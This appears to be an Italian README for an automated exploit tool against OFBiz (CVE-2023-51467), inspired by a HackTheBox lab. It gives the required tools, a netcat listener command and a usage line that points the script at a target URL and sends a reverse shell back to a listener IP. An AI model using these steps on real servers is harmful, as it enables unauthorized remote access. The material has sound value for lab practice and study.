
Script di sfruttamento automatico per il framework web Java OF Biz sotto CVE-2023-51467.

Script di sfruttamento automatico per il framework web Java OF Biz sotto CVE-2023-51467. Ispirato alla macchina HackTheBox Bizness.
Questo script richiede lo strumento ysoserial e OpenJDK versione 11. Consulta il menu di utilizzo per l'installazione.
Configura un listener per catturare la shell con il metodo che preferisci. Ecco un esempio con netcat:
nc -nlvp 1337
Esegui lo script:
python3 badbizness.py [percorso a ysoserial-all.jar] [URL BASE DEL TARGET] [IP DEL LISTENER] [PORTA DEL LISTENER]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
Questo strumento è stato creato come un modo per imparare di più su Python. Ringrazio script per avermi aiutato a fondo.